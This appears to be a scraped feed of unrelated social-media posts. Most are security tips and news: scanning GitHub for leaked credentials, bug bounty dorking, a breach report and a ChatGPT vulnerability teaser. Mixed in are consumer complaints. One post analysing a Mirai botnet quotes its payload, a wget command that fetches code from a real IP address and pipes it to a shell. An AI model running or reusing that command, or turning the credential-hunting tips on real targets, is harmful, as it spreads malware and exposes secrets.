Scanning github repos is a great way to find juicy information, secrets and credentials!
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
Check this out👇
I lost my AirPods 2 on a train, and someone picked them up. Find My shows their location in Namakkal. If anyone in the area can help or if @namakkalpolice@Namakkal can assist, please reach out! 🙏 #LostAndFound"
Uhaul was breached. 13GBs of data was exfiltrated from their SharePoint. Initial access was granted by social engineering an employee through text messages.
tl;dr another day in Shangri-La
Here is a little hack I've been using. Google custom search engine where I entered all bug bounty program domains I'm invited to. This allows me to mass-dork on all the scopes everyday and look for juicy places to dig in.
#bugbounty#bugbountytip#cybersecurity
Don't discount dead subdomains in bug bounty! Try enumerating them against valid target IP addresses, who knows what you might find 😏
@leetibrahim has had some success with this tip, hopefully you will too!
#bugbounty#bugbountytips 👇
How could I have Hacked into any #ChatGPT account, including saved conversations, account status, chat history and more!
A tale of 4 ChatGPT vulnerabilities 👇
We can discuss it now that the #OpenAI team has confirmed it's completely fixed.
Let me explain 🤌:
What vulnerability is #Mirai#Botnet exploiting? I can't find references, 0day or a bug in the Matrix? 🤔
The alleged "exploit" is hardcoded in the scan.arm binary.
Payload: TCP_MSGHEAD_CMD wget http://109.206.243.207/d -O-|sh
Source of scans (245 IPs): https://t.co/C1cqLsygDL
Purchased Lg 9KG front load washing machine from Croma store and received faulty one and now what they suggest to repair it not a replacement. I trusted @LGIndia and @cromaretail invested our hard-earned money in buying LG's front load washing machine.